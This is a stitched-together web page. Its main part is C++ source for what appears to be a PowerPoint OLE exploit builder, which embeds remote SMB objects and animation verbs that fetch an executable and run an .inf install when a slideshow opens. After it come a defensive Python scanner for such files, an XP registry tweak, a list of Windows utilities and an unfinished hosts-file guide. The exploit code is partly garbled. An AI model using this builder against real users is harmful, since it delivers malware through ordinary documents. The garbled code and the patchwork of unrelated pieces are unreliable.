    PowerPoint::Sequence *pSequence = NULL;
    PowerPoint::Effect *pEffect = NULL;
    PowerPoint::AnimationBehaviors *pAnimationBehaviors = NULL;
    PowerPoint::AnimationBehavior *pAnimationBehavior = NULL;
    PowerPoint::CommandEffect *pCommandEffect = NULL;
    PowerPoint::SlideShowTransition *pSlideShowTransition = NULL;
    VARIANT varSlideIndex;

    /* Produce file name for saving

    saveAsType = PowerPoint::PpSaveAsFileType::ppSaveAsOpenXMLShow;

    CHK_ALLOC( bstrApplicationProgId = SysAllocString(L”Powerpoint.Application”));

    /* Obtain POwerPoint App CLSID from PowerPoint App Identifier
    CHK_HR( CLSIDFromProgID( bstrApplicationProgId, &appClsid) );

    /* Create instance of POWERPOINT Application
    CHK_HR( CoCreateInstance(
    (LPVOID*)&pApplication) );

    /* Get presentation collection
    CHK_HR( pApplication ->get_Presentations(&pPresentations) );

    /* Open presentation
    CHK_ALLOC( bstrPresentationPath = SysAllocString(fname) );

    CHK_HR( pPresentations ->raw_Open(
    &pPresentation) );

    /* Make sure that presentation doesn’t have a lot of ole packages
    if (!presentation_does_have_ole_packages(pPresentation, &bDoesHaveOlePackages)) {

    CHK_HR( E_ABORT );

    if (bDoesHaveOlePackages) {

    printf(“[-] ERROR: Specified presentation already includes OLE objects or no slides found.n”);

    CHK_HR( E_ABORT );

    /* Get collection of slides

    CHK_HR( pPresentation ->get_Slides( &pSlides) );

    /* Get first slide by index
    VariantInitAsLong(varSlideIndex, 1);

    CHK_HR( pSlides ->raw_Item( varSlideIndex, &pSlide) );

    /* Get collection of shapes in slide
    CHK_HR( pSlide ->get_Shapes( &pShapes) );

    /* Add 1-th shape to slide as first OLE object
    CHK_HR( pShapes ->raw_AddOLEObject(
    100.0, -100.0, 30.0, 30.0,
    ) );

    /* Add 2-th shape to slide as second OLE object
    CHK_HR( pShapes ->raw_AddOLEObject(
    150.0, -100.0, 30.0, 30.0,
    ) );

    /* Configure slide timing
    CHK_HR( pSlide ->get_TimeLine( &pTimeLine ) );

    /* Obtain Main Sequence for timeLine of slide
    CHK_HR( pTimeLine ->get_MainSequence( &pSequence) );

    /* Produce first effect for 1-th shape.
    1-th shape specifies OLE Object which just copies .exe payload
    from remote SMB server and stores in temporary file.
    Specify command verb as ‘-3’ which tells to ShellApi do nothing.
    Effect with id 1 loads slide background.
    Effect with id 2 loads exe stub from remote server.
    CHK_HR( pSequence ->raw_AddEffect(
    PowerPoint::MsoAnimTriggerType::msoAnimTriggerWithPrevious, //PowerPoint::MsoAnimTriggerType::msoAnimTriggerOnPageClick,
    &pEffect) );

    SAFE_RELEASE_BY_REF( &pEffect );

    CHK_HR( pSequence ->raw_AddEffect(
    PowerPoint::MsoAnimTriggerType::msoAnimTriggerAfterPrevious, //PowerPoint::MsoAnimTriggerType::msoAnimTriggerOnPageClick,
    &pEffect) );

    CHK_HR( pEffect ->get_Behaviors( &pAnimationBehaviors) );

    CHK_HR( pAnimationBehaviors ->raw_Add( PowerPoint::MsoAnimType::msoAnimTypeCommand, 1, &pAnimationBehavior) );

    CHK_HR( pAnimationBehavior ->get_CommandEffect( &pCommandEffect) );

    CHK_HR( pCommandEffect ->put_Type( PowerPoint::MsoAnimCommandType::msoAnimCommandTypeVerb) );

    CHK_HR( pCommandEffect ->put_Command( _bstr_t(L”-3″)) );

    /* Release resources assigned with Shape0
    SAFE_RELEASE_BY_REF( &pCommandEffect );
    SAFE_RELEASE_BY_REF( &pAnimationBehavior );
    SAFE_RELEASE_BY_REF( &pAnimationBehaviors );
    SAFE_RELEASE_BY_REF( &pEffect );
    SAFE_RELEASE_BY_REF( &pShape0 );

    /* Produce first effect for 2-th shape.
    2-th shape specifies OLE Object which simple copies .inf file
    from remote SMB server and stores in temporary file with .inf extension.
    Specify command verb as ‘3’ which tells to ShellApi do ‘Install’ action.
    Effect with id 3 loads .inf from remote server and start it.
    CHK_HR( pSequence ->raw_AddEffect(
    &pEffect) );

    CHK_HR( pEffect ->get_Behaviors( &pAnimationBehaviors) );

    CHK_HR( pAnimationBehaviors ->raw_Add( PowerPoint::MsoAnimType::msoAnimTypeCommand, 1, &pAnimationBehavior) );

    CHK_HR( pAnimationBehavior ->get_CommandEffect( &pCommandEffect) );

    CHK_HR( pCommandEffect ->put_Type( PowerPoint::MsoAnimCommandType::msoAnimCommandTypeVerb) );

    CHK_HR( pCommandEffect ->put_Command( _bstr_t(L”3″)) );
    /* Release resources assigned with Shape1
    SAFE_RELEASE_BY_REF( &pCommandEffect );
    SAFE_RELEASE_BY_REF( &pAnimationBehavior );
    SAFE_RELEASE_BY_REF( &pAnimationBehaviors );
    SAFE_RELEASE_BY_REF( &pEffect );
    SAFE_RELEASE_BY_REF( &pShape1 );

    /* Configure SlideShowTransition

    CHK_HR( pSlide ->get_SlideShowTransition(&pSlideShowTransition) );

    CHK_HR( pSlideShowTransition ->put_EntryEffect( PowerPoint::PpEntryEffect::ppEffectBoxOut ) );

    CHK_HR( pSlideShowTransition ->put_AdvanceTime( 0.5 ) );

    SAFE_RELEASE_BY_REF( &pSlideShowTransition );

    /* Release resources assigned with Presentation
    SAFE_RELEASE_BY_REF( &pSequence );
    SAFE_RELEASE_BY_REF( &pTimeLine );
    SAFE_RELEASE_BY_REF( &pShapes );
    SAFE_RELEASE_BY_REF( &pSlide );
    SAFE_RELEASE_BY_REF( &pSlides );

    /* Save presentation
    CHK_ALLOC(bstrSaveAs = SysAllocString(stdWstrFileSaveAs.c_str()) );

    CHK_HR( pPresentation ->raw_SaveAs( bstrSaveAs, saveAsType, Office::MsoTriState::msoTriStateMixed) );

    bres = true;


    VariantClear( &varSlideIndex );

    SAFE_FREE_BSTR_BY_REF( &bstrPresentationPath );

    SAFE_FREE_BSTR_BY_REF( &bstrApplicationProgId );

    SAFE_FREE_BSTR_BY_REF( &bstrSaveAs );

    /* Release resources assigned with Shape0 and Shape1
    SAFE_RELEASE_BY_REF( &pCommandEffect );
    SAFE_RELEASE_BY_REF( &pAnimationBehavior );
    SAFE_RELEASE_BY_REF( &pAnimationBehaviors );
    SAFE_RELEASE_BY_REF( &pEffect );
    SAFE_RELEASE_BY_REF( &pShape0 );
    SAFE_RELEASE_BY_REF( &pShape1 );

    /* Release resources assigned with Presentation
    SAFE_RELEASE_BY_REF( &pSlideShowTransition );
    SAFE_RELEASE_BY_REF( &pSequence );
    SAFE_RELEASE_BY_REF( &pTimeLine );
    SAFE_RELEASE_BY_REF( &pShapes );
    SAFE_RELEASE_BY_REF( &pSlide );
    SAFE_RELEASE_BY_REF( &pSlides );

    /* Close Currently opened presentation
    if (pPresentation) {

    pPresentation ->raw_Close();
    SAFE_RELEASE_BY_REF( &pPresentation );

    SAFE_RELEASE_BY_REF( &pPresentations );

    /* Close powerpoint automation application
    if (pApplication) {

    pApplication ->raw_Quit();

    SAFE_RELEASE_BY_REF( &pApplication );

    return bres;

    bool create_ole_embed_stg_copy(__in const wchar_t *file_result, __in char *str1, __in char *str2) {

    bool bresult = false;
    IStorage *pStorage = NULL;
    IStream *pStream = NULL;
    HRESULT hresult = S_OK;
    CLSID clsidMedia = {0};
    VOID *pvFileData = NULL;
    size_t dataSize = 0;
    ULONG bytesWritten = 0;
    char trailer = 0;
    wstring stdWstrFileNameOut;


    hresult =

    if (FAILED(hresult)) {

    //printf(“[-] %s(): StgCreateStorageEx failed with error: %d(%08x)rn”, __FUNCTION__, hresult, hresult);


    hresult =
    pStorage ->CreateStream(

    if (FAILED(hresult)) {

    //printf(“[-] %s(): IStorage::CreateStream failed with error: %d(%08x)rn”, __FUNCTION__, hresult, hresult);


    dataSize = strlen(str1) + 1 + strlen(str2) + 1;

    // write header
    hresult = pStream ->Write( &dataSize, (ULONG)4, &bytesWritten );

    if (FAILED(hresult)) {

    //printf(“[-] %s(): IStream::Write(header) failed with error %d(%08x)rn”, __FUNCTION__, hresult, hresult);


    // write string 1
    hresult = pStream ->Write( str1, (ULONG)strlen(str1), &bytesWritten );

    if (FAILED(hresult)) {

    //printf(“[-] %s(): IStream::Write(string#1) failed with error %d(%08x)rn”, __FUNCTION__, hresult, hresult);


    // write string 1 trailer
    hresult = pStream ->Write( &trailer, (ULONG)1, &bytesWritten );

    if (FAILED(hresult)) {

    //printf(“[-] %s(): IStream::Write(string#1 trailer) failed with error %d(%08x)rn”, __FUNCTION__, hresult, hresult);


    // write string 2
    hresult = pStream ->Write( str2, (ULONG)strlen(str2), &bytesWritten );

    if (FAILED(hresult)) {

    //printf(“[-] %s(): IStream::Write(string#2) failed with error %d(%08x)rn”, __FUNCTION__, hresult, hresult);


    // write string 2 trailer
    hresult = pStream ->Write( &trailer, (ULONG)1, &bytesWritten );

    if (FAILED(hresult)) {

    //printf(“[-] %s(): IStream::Write(string#2 trailer) failed with error %d(%08x)rn”, __FUNCTION__, hresult, hresult);


    // write class of storage
    hresult = CLSIDFromString( L”{00022602-0000-0000-C000-000000000046}”, &clsidMedia);

    if (FAILED(hresult)) {

    //printf(“[-] %s(): CLSIDFromString failed with error %d(%08x)rn”, __FUNCTION__, hresult, hresult);


    hresult = WriteClassStg(pStorage, clsidMedia);

    if (FAILED(hresult)) {

    //printf(“[-] %s(): WriteClassStg failed with error %d(%08x)rn”, __FUNCTION__, hresult, hresult);


    //printf(“[+] %s(): Storage %S created.rn”, __FUNCTION__, file_result);
    change_file_time( (wchar_t*)stdWstrFileNameOut.c_str() );

    bresult = true;

    SAFE_RELEASE_BY_REF( &pStream );

    SAFE_RELEASE_BY_REF( &pStorage );

    if(pvFileData) {


    return bresult;


    bool create_somthing_file(wchar_t *fpath) {

    DWORD bytesWritten = 0;

    if (hFile == INVALID_HANDLE_VALUE || hFile == NULL) {

    wprintf(L”[-] ERROR: Cannot create temporary file %s with some datan”, fpath);

    return false;

    if (FALSE == WriteFile( hFile, “Some Datan”, strlen(“Some Datan”), &bytesWritten, NULL)) {

    wprintf(L”[-] ERROR: Cannot write temporary file %s with some datan”, fpath);


    return false;


    return true;

    bool generate_inf_file(wchar_t *fnameInf, wchar_t *fnameExeOnSmb) {

    DWORD bytesWritten = 0;
    wstring stdFnameExeOnSmb;
    string stdFnameExeOnSmbA;
    string data;
    BOOL bres = FALSE;

    stdFnameExeOnSmbA.append(stdFnameExeOnSmb.begin(), stdFnameExeOnSmb.end());

    if (hFile == INVALID_HANDLE_VALUE || hFile == NULL) {

    wprintf(L”[-] ERROR: Cannot create temporary file %s with some datan”, fnameInf);

    return false;

    data.append(“; 61883.INFn”);
    data.append(“; Copyright (c) Microsoft Corporation. All rights reserved.nn”);

    data.append(“Signature = “$CHICAGO$”n”);

    data.append(“DefaultDestDir = 1nn”);

    data.append(“RenFiles = RxRenamen”);
    data.append(“AddReg = RxStartnn”);

    data.append(“.exe, “);


    bres = WriteFile(hFile, data.c_str(), data.length(), &bytesWritten, NULL);



    return (bres);

    int wmain(int argc, wchar_t **argv) {

    wstring stdWstrSaveAs,

    wstring stdFnamePptIn,
    string stdPathExeOnSmbA,

    bool bForceUpload = false;

    wchar_t currDir[MAX_PATH];

    GetCurrentDirectoryW(MAX_PATH, currDir);

    if (!parse_cmd(argc, argv, &stdFnamePptIn, &stdSmbPath, &stdFnameExe, &stdFnameExeOnSmb, &stdFnameInfOnSmb, &bForceUpload ) ) {

    printf(“[-] ERROR: invalid inputn”);

    return 0;




    /* Construct a path to exe on SMB as %stdSmbPath%%stdFnameExeOnSmb%
    stdPathExeOnSmbA.append(stdPathExeOnSmb.begin(), stdPathExeOnSmb.end());

    /* Construct a path to inf on SMB as %stdSmbPath%%stdFnameInfOnSmb%
    stdPathInfOnSmbA.append(stdPathInfOnSmb.begin(), stdPathInfOnSmb.end());

    /* Construct a path to tmp1 file

    if (!create_somthing_file((wchar_t*)stdPathTmp1.c_str()) ) {


    /* Construct a path to tmp2 file

    if (!create_somthing_file((wchar_t*)stdPathTmp2.c_str()) ) {


    /* Modify presentation imm
    if (!produce_presentation(
    (wchar_t *)stdWstrSaveAs.c_str(),
    (wchar_t *) stdPathTmp1.c_str(),
    (wchar_t *) stdPathTmp2.c_str()
    ) )

    printf(“[-] ERROR: cannot update presentationn”);


    /* Create OLE 1-th Object

    if (!create_ole_embed_stg_copy(stdWstrObject1.c_str(), “EmbeddedStg1.txt”, (char*)stdPathExeOnSmbA.c_str()) ) {

    printf(“[-] ERROR: cannot create 1-th OLE Objectn”);


    /* Create OLE 2-th Object
    if (!create_ole_embed_stg_copy(stdWstrObject2.c_str(), “EmbeddedStg2.txt”, (char*)stdPathInfOnSmbA.c_str()) ) {

    printf(“[-] ERROR: cannot create 2-th OLE Objectn”);


    /* Generate inf file

    if (!generate_inf_file((wchar_t*)stdPathInf.c_str(), (wchar_t*)stdFnameExeOnSmb.c_str())) {

    printf(“[-] ERROR: Cannot generate inf filen”);

    /* Generate exe for SMB

    if (!CopyFileW(stdFnameExe.c_str(), stdPathExe.c_str(), FALSE)) {
    wprintf(L”[-] ERROR: Cannot create ‘%s’ from ‘%s’n”, stdFnameExeOnSmb.c_str(), stdFnameExe.c_str());


    /* Upload files onto remote shared folder
    if (bForceUpload) {

    if (!CopyFileW( stdPathExe.c_str(), stdPathExeOnSmb.c_str(), FALSE)) {

    wprintf(L”[-] ERROR: Cannot upload .exe file ‘%s’ to ‘%s’n”, stdPathExe.c_str(), stdSmbPath.c_str());

    if (!CopyFileW( stdPathInf.c_str(), stdPathInfOnSmb.c_str(), FALSE)) {

    wprintf(L”[-] ERROR: Cannot upload .inf file ‘%s’ to ‘%s’n”, stdPathInf.c_str(), stdSmbPath.c_str());
    int step = 1;
    wprintf(L”[+] INFO: n”);
    wprintf(L” %d) Rename presentation file ‘%s’ to ‘’;n”, step++, stdWstrSavedAs.c_str(), stdWstrSavedAs.c_str());
    wprintf(L” %d) Stupid MS developers cann’t create API for zip, so unzip ‘’n”, step++, stdWstrSavedAs.c_str());
    wprintf(L” %d) Copy ‘%s’ into ‘ppt/embeddings’ sub-directory of unzipped file;n”, step++, stdWstrObject1.c_str());
    wprintf(L” %d) Copy ‘%s’ into ‘ppt/embeddings’ sub-directory of unzipped file;n”, step++, stdWstrObject2.c_str());
    wprintf(L” %d) Zip unzipped presentation and rename to presentation with ‘.ppsx’n”, step++);
    if (bForceUpload) {
    wprintf(L” %d) Copy ‘%s’ into ‘%s’n”, step++, stdFnameExeOnSmb.c_str(), stdSmbPath.c_str());
    wprintf(L” %d) Copy ‘%s’ into ‘%s’n”, step++, stdFnameInfOnSmb.c_str(), stdSmbPath.c_str());
    wprintf(L” %d) Enjoy..n”, step++);


    DeleteFileW( stdPathTmp1.c_str());

    DeleteFileW( stdPathTmp2.c_str());



    bool presentation_does_have_ole_packages(__in PowerPoint::_Presentation *pPresentation, __out bool *doesHave) {

    bool bres = false;
    PowerPoint::Slides *pSlides = NULL;
    PowerPoint::_Slide *pSlide = NULL;
    PowerPoint::Shapes *pShapes = NULL;
    PowerPoint::Shape *pShape = NULL;
    PowerPoint::OLEFormat *pOLEFormat = NULL;
    long slidesCount = 0;
    VARIANT varSlideIndex,
    int shapesCount = 0;
    MsoAutoShapeType shapeType;
    BSTR bstrProgId = NULL;
    IDispatch *pOLEDispObject = NULL;

    assert(doesHave != NULL);
    assert(pPresentation != NULL);

    *doesHave = false;

    /* Get pointer to interface of Slides object.
    CHK_HR(pPresentation ->get_Slides(&pSlides) );

    /* Get count of slides in presentation
    CHK_HR(pSlides ->get_Count(&slidesCount) );

    /* Make sure that slides exist in presentation
    if (slidesCount == 0) {

    printf(“[-] Failed couse no slides found in presentationn”);


    for (long i = 1; i <= slidesCount; i ++) {

    VariantInitAsLong(varSlideIndex, i);

    CHK_HR( pSlides ->raw_Item( varSlideIndex, &pSlide) );

    VariantClear( &varSlideIndex );

    /* Get list of shapes
    CHK_HR( pSlide ->get_Shapes( &pShapes) );

    /* Get count of shapes
    CHK_HR( pShapes ->get_Count(&shapesCount) );

    /* Verify each shape
    for (int j = 1; j <= shapesCount; j++) {

    VariantInitAsLong( varShapeIndex, j);

    CHK_HR( pShapes ->raw_Item( varShapeIndex, &pShape) );

    VariantClear( &varShapeIndex );

    CHK_HR( pShape ->get_AutoShapeType( &shapeType) );

    if (shapeType == Office::MsoAutoShapeType::msoShapeMixed) {

    CHK_HR( pShape ->get_OLEFormat(&pOLEFormat) );

    CHK_HR( pOLEFormat ->get_ProgID( &bstrProgId) );

    if (wcsicmp( L”Package”, bstrProgId) == 0) {

    *doesHave = true;

    SAFE_FREE_BSTR_BY_REF( &bstrProgId );


    SAFE_RELEASE_BY_REF( &pShape );

    if (*doesHave) {


    SAFE_RELEASE_BY_REF( &pShapes );

    SAFE_RELEASE_BY_REF( &pSlide );

    if (*doesHave) {


    bres = true;


    VariantClear( &varShapeIndex );

    VariantClear( &varSlideIndex );

    SAFE_FREE_BSTR_BY_REF( &bstrProgId );


    SAFE_RELEASE_BY_REF( &pShape );

    SAFE_RELEASE_BY_REF( &pShapes );

    SAFE_RELEASE_BY_REF( &pSlide );

    SAFE_RELEASE_BY_REF( &pSlides );

    return bres;

    bool change_file_time(wchar_t *fname) {

    SYSTEMTIME systemTime = {0};
    FILETIME fileTime = {0};

    GetSystemTime( &systemTime);

    systemTime.wYear = 1980;
    systemTime.wMonth = 1;
    systemTime.wDay = 1;
    systemTime.wHour = 15;
    systemTime.wMinute = 0;
    systemTime.wSecond = 0;

    hFile =

    if (hFile == NULL || hFile == INVALID_HANDLE_VALUE) {

    return false;

    SystemTimeToFileTime( &systemTime, &fileTime);

    SetFileTime( hFile, &fileTime, &fileTime, &fileTime);


    return true;

    bool rewrite_embeddings_in_presentation(__in wchar_t *fnameZip, __in wchar_t *fnameData)
    Oh fuck! Stupid Microsoft developers cann’t create human-relible
    API for zip management. 21st century! WTF? I cann’t use IShell
    interface for zip management, so use 3rd party zip archivers.

    bool bres = false;
    IShellDispatch *pShell = NULL;
    VARIANT varDir,
    Folder *pFolder = NULL;
    wstring stdWstrDir;



    CHK_HR( CoCreateInstance( CLSID_Shell, NULL, CLSCTX_INPROC_SERVER, IID_IShellDispatch, (LPVOID*)&pShell) );

    varDir.vt = VT_BSTR;
    varDir.bstrVal = _bstr_t(stdWstrDir.c_str());

    CHK_HR( pShell ->NameSpace(varDir, &pFolder) );

    varFile.vt = VT_BSTR;
    varFile.bstrVal = _bstr_t(fnameData);

    varOption.vt = VT_I4;
    varOption.lVal = FOF_NO_UI;

    CHK_HR( pFolder ->CopyHere( varFile, varOption) );

    Sleep( 1000 );

    bres = true;


    //VariantClear( &varOption );
    //VariantClear( &varFile );
    //VariantClear( &varDir );

    SAFE_RELEASE_BY_REF( &pFolder );

    SAFE_RELEASE_BY_REF( &pShell );

    return bres;

    bool parse_cmd(
    __in int argc,
    wchar_t **argv,
    wstring *fnamePptIn,
    wstring *smbPath,
    wstring *fnameExe,
    wstring *fnameExeOnSmb,
    wstring *fnameInfOnSmb,
    bool *bForceUpload
    wstring stdOpt;
    bool bFnamePptIn = false,
    bSmbPath = false,
    bFnameExe = false,
    bFnameExeOnSmb = false,
    bFnameInfOnSmb = false;

    if (argc < 11) {


    return false;

    for (int i = 1; i < argc; i++) {



    if (”–force-upload”) == 0) {

    *bForceUpload = true;


    if ((i+1) >= argc) {

    printf(“[-] ERROR: malformed inputn”);

    return false;

    if (”-p”) == 0 ) {

    fnamePptIn ->clear();

    fnamePptIn ->append( argv[i+1]);


    bFnamePptIn = true;


    if (”-smb”) == 0 ) {

    smbPath ->clear();

    smbPath ->append( argv[i+1]);


    bSmbPath = true;


    if (”-ef”) == 0 ) {

    fnameExe ->clear();

    fnameExe ->append( argv[i+1]);


    bFnameExe = true;


    if (”-eof”) == 0 ) {

    fnameExeOnSmb ->clear();

    fnameExeOnSmb ->append( argv[i+1]);


    bFnameExeOnSmb = true;


    if (”-iof”) == 0 ) {

    fnameInfOnSmb ->clear();

    fnameInfOnSmb ->append( argv[i+1]);


    bFnameInfOnSmb = true;


    if (!bFnamePptIn || !bSmbPath || !bFnameExe || !bFnameExeOnSmb || !bFnameInfOnSmb) {

    printf(“[-] ERROR: Not all options specifiedn”);

    return false;

    return true;

    void print_usage_and_exit(wchar_t *exe) {

    L” **************************************************************** n”
    L”[?] Usage: %s [option|[option]…] n”
    L” **************************************************************** n”
    L” options: n”
    L” -p – path to input PowerPoint presentation file; n”
    L” -smb – UNC path on remote server in which files should be n”
    L” placed, f.e: ; n”
    L” -ef – path to executable file to be launched on 0wned n”
    L” machine; content of file ‘ll be stored into -eof n”
    L” file; n”
    L” -eof – name of file into which -ef file’s content to be n”
    L” stored; exploit uploads this file onto -smb path n”
    L” automatically; make sure that -eof file is located n”
    L” on remote server before exploitation phase; n”
    L” -iof – name of .inf file to be stored on remote server; n”
    L” exploit extracts .inf stub from self and stores into n”
    L” file on remote host automatically; make sure that n”
    L” this file exists on remote server before exploitation n”
    L” phase; n”
    L” –force-upload n”
    L” – specifies explicit file’s uploading to remote server; n”
    L” **************************************************************** n”
    L” EXAMPLE: n”
    L” -p a.pptx -smb -ef E:stub.exe n”
    L” -eof Config.xml -iof Preview.inf –force-upload n”
    L” creates a.pptx.saved.ppsx file from a.pptx; n”
    L” stores stub.exe into; n”
    L” stores .inf stub into; n”
    L” **************************************************************** n”
    L” NOTES: n”
    L” -smb, -iof, -eof are written into presentations, so make sure n”
    ” that specified things exist in real life; n”
    L” **************************************************************** n”,


    /* EOF
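
A defender's check for the kind of file the code above produces, as an added example that is not part of the original post: it scans a presentation package for objects under ppt/embeddings that carry a UNC path and for slide animations that fire an OLE verb. The function names, the raw byte search, the `p:` XML prefix and the constructed sample package are assumptions of this example.

```python
import io
import re
import zipfile

MAX_PART = 32 * 1024 * 1024  # skip oversized parts instead of inflating them

# UNC path stored as single-byte text, e.g. \\host\share\file
UNC_ASCII = re.compile(rb"\\\\[A-Za-z0-9._-]{1,63}\\[\x20-\x7e]{1,200}")
# The same path stored as UTF-16LE
UNC_UTF16 = re.compile(
    rb"\\\x00\\\x00(?:[A-Za-z0-9._-]\x00){1,63}\\\x00(?:[\x20-\x7e]\x00){1,200}"
)
# Animation command behaviour of type "verb"; the conventional p: prefix is assumed
VERB_TAG = re.compile(rb'<p:cmd\b[^>]*\btype="verb"[^>]*>')
CMD_ATTR = re.compile(rb'\bcmd="([^"]*)"')


def find_unc_paths(blob):
    """Return the distinct UNC paths found anywhere in a byte string.

    This is a raw search: a path split across sectors of an OLE compound
    file is missed, so parse the compound file when exactness matters.
    """
    hits = {m.group().decode("ascii") for m in UNC_ASCII.finditer(blob)}
    hits |= {m.group().decode("utf-16-le") for m in UNC_UTF16.finditer(blob)}
    return sorted(hits)


def find_verb_commands(slide_xml):
    """Return the cmd= value of every <p:cmd type="verb"> element."""
    verbs = []
    for tag in VERB_TAG.finditer(slide_xml):
        attr = CMD_ATTR.search(tag.group())
        verbs.append(attr.group(1).decode("ascii", "replace") if attr else "")
    return verbs


def scan_presentation(data):
    """Scan the bytes of a .pptx/.ppsx package and report both indicators."""
    report = {"remote_embeddings": {}, "verb_commands": {}, "skipped": []}
    with zipfile.ZipFile(io.BytesIO(data)) as pkg:
        for info in pkg.infolist():
            name = info.filename.lower()
            is_embedding = name.startswith("ppt/embeddings/")
            is_slide = name.startswith("ppt/slides/") and name.endswith(".xml")
            if not (is_embedding or is_slide):
                continue
            if info.file_size > MAX_PART:
                report["skipped"].append(info.filename)
                continue
            blob = pkg.read(info)
            if is_embedding:
                paths = find_unc_paths(blob)
                if paths:
                    report["remote_embeddings"][info.filename] = paths
            else:
                verbs = find_verb_commands(blob)
                if verbs:
                    report["verb_commands"][info.filename] = verbs
    # Either indicator alone is common in benign files; flag the combination.
    report["suspicious"] = bool(report["remote_embeddings"]) and bool(
        report["verb_commands"]
    )
    return report


def build_sample_package(flagged):
    """Constructed test input: a minimal zip with one embedding and one slide."""
    if flagged:
        embedding = (b"\x00" * 8 + b"EmbeddedStg1.txt\x00"
                     + rb"\\fileserver.example.test\share\notes.txt" + b"\x00")
        slide = b'<p:sld><p:cmd type="verb" cmd="3"><p:cBhvr/></p:cmd></p:sld>'
    else:
        embedding = b"\x00" * 8 + b"Workbook\x00"
        slide = (b'<p:sld><p:cmd type="call" cmd="playFrom(0.0)">'
                 b"<p:cBhvr/></p:cmd></p:sld>")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as pkg:
        pkg.writestr("ppt/embeddings/oleObject1.bin", embedding)
        pkg.writestr("ppt/slides/slide1.xml", slide)
    return buf.getvalue()


if __name__ == "__main__":
    print(scan_presentation(build_sample_package(True)))
```

A hit is a triage signal, not a verdict: linked objects can legitimately point at file shares, so review the reported paths and verbs by hand.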

Microsoft XP updated until 2019 – tweak

The registry addition tricks Microsoft into thinking your PC is running the Point Of Sale “Embedded” version of Windows, which will continue to have updates until 2019. The change only works on 32-bit systems, not 64-bit. Microsoft warns this is a bad idea and suggests, naturally, you replace the operating system with Windows 7 or higher. If you make this change to an XP machine, you do this at your own risk. To make the change:

Make sure your computer is properly backed up in case anything goes wrong. Then, open Notepad to create a new text document.

Paste in the following text:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\WPA\PosReady]
"Installed"=dword:00000001

Save the text file, but change its extension from .txt to .reg.

Double-click your newly-created .reg file to make the tweak.

If you have a system that you can’t quite get rid of yet, this could make it last a bit longer. Hit the link below to read more about the tweak.

Top 10 Incredibly Useful Windows Programs to Have On Hand

Some apps are essential, and you use them every day. Everyone knows their names: Firefox, VLC, 7-Zip, and so on. However, there’s another class of app that gets less attention: the apps that are insanely useful to have in your back pocket on the rare occasions you need them. Here are 10 of our favorites.

10. Speccy

Maybe you’ve forgotten what kind of RAM you bought, or want a quick glance at your CPU’s temperature. Speccy scans your machine and gives you a complete rundown of everything, from model numbers to temperatures, fan speeds, S.M.A.R.T. status, and…well, pretty much anything else you can think of. It’s also available in portable form, so you don’t have to install anything—just stick it in a folder for when you really need it. For an alternative, check out HWiNFO.

9. Ultimate Windows Tweaker

When you first install Windows, you probably get everything set up just the way you like it, including all your favorite little Registry hacks and unsupported tweaks. You might even discover new ones later and try them out. Apps like Ultimate Windows Tweaker make this a lot easier, and they’re useful to keep around later if you start incorporating new things into your workflow. Its list of features is endless, allowing you to tweak the tiniest features in the taskbar, Windows Explorer, the lock screen, and anything else you could imagine. Download it once and keep it forever (and as always, back up before you start tweaking your system).

8. Stress Testing Utilities

Overclockers are probably very familiar with stress testing utilities like Prime95, LinX, and AIDA64. If you’ve overclocked your CPU, you should definitely keep these around, but they can be useful for non-overclockers too. When your processor is having issues, it can be difficult to diagnose. If some of your apps are crashing, a stress test like Prime95 can help you figure out whether your CPU is the problem (or whether it’s something else). Many folks also recommend giving a new computer a stress test to make sure there aren’t any problems. Most of these are also portable, so you can throw them in a folder and start them up when you need them.

7. MalwareBytes, VirusTotal, and AdwCleaner

We put these in the same category since they all protect you from unwanted programs, but they’re each useful in their own right. You probably have a good antivirus program running all the time, but no antivirus program catches everything—so it’s useful to have a secondary program to check once in a while. MalwareBytes is great because it only works on-demand, which means it won’t conflict with your always-running antivirus tool. The VirusTotal Uploader, on the other hand, lets you scan any individual file with over 50 antivirus tools at once, so it’s great if you’ve downloaded something you think might be fishy. Lastly, if you’ve accidentally installed an annoying toolbar on your system that just won’t go away, AdwCleaner will help you get rid of it.

6. Magical Jelly Bean KeyFinder

Ever had to reinstall a program, but couldn’t find your product key? Magical Jelly Bean KeyFinder will search your PC for installed programs, and—if they have a product key—show them to you, so you can write it down and use it the next time you reinstall. Note: this one contains some toolbars and such upon installation, so be sure to use the custom installation to avoid the crapware.

5. Process Explorer

The Windows Task Manager can show you a lot of information about what programs are running, and usually it does what you need it to. But on the rare occasions you need more information—like if you’re trying to figure out which program is using your webcam, for example—you need Process Explorer. Process Explorer is one of the many Task Manager alternatives out there, offering information on what files are currently in use, what hardware, and what each program is doing. If the regular Task Manager isn’t giving you the info you need, Process Explorer will.

4. UNetbootin and YUMI

Even if you’re a diehard Windows user, Linux can be really useful from time to time—especially for troubleshooting. Traditionally, Linux distros and other troubleshooting tools come in the form of live CDs, but if you don’t have a CD drive, UNetbootin is a seriously handy tool. It can turn nearly any ISO into a bootable flash drive. Even better is YUMI, which lets you put multiple live CDs on one flash drive—meaning you can combine all your favorite rescue discs, Linux distros, and other tools and put them in your pocket.

3. Wireless Network Watcher (and Other Network Tools)

Need to see a list of all the computers on your network, along with IP addresses, MAC addresses, and other information? Whether you’re planning your network or think someone’s stealing your Wi-Fi, Wireless Network Watcher is a handy tool to have around. Despite its name, it works over wired networks, too. Of course, we also recommend checking out all of NirSoft’s network tools—which one you use depends on what you’re trying to troubleshoot, but they’re all pretty awesome.

2. WinDirStat

We all reach that fateful day at some point: when your computer tells you it’s running out of space. Not sure where it’s all going? WinDirStat will tell you. It scans all of your disks and shows you the biggest folders, which file types are taking up space, and more. If you’ve tried the usual things (like Disk Cleanup) and are still coming up short, WinDirStat is the next step in the disk cleaning process.

1. Sandboxie

Let’s admit it: sometimes, even though we know it’s wrong, we all open the occasional sketchy program or file. We’re not judging, but if you’re going to do it, at least use protection. Enter Sandboxie, which lets you run programs independent of the rest of your system. That way they can’t infect, access, or otherwise interfere with your Windows installation. It’s also great for testing apps you aren’t sure of or running multiple instances of an app that won’t let you, so it’s fun for the whole family.

How to block access to a website

If you are concerned about someone in the family or workplace using a certain website, there are a few different methods of restricting access. Although it is possible to block access on a specific browser, many computers these days have more than one browser available to a user.

Another option is to edit a file within Windows known as the hosts file. Using this method makes it possible to restrict access to a particular website regardless of what browser someone is using.

Step 1

Move the mouse to either the top or bottom right corner of the screen and the Charms menu will slide into place.

From this menu click on Search.

Select Search from Charms menu

Step 2

Make sure that Apps is selected and type Notepad.

On the left side of the screen, the Notepad should appear.

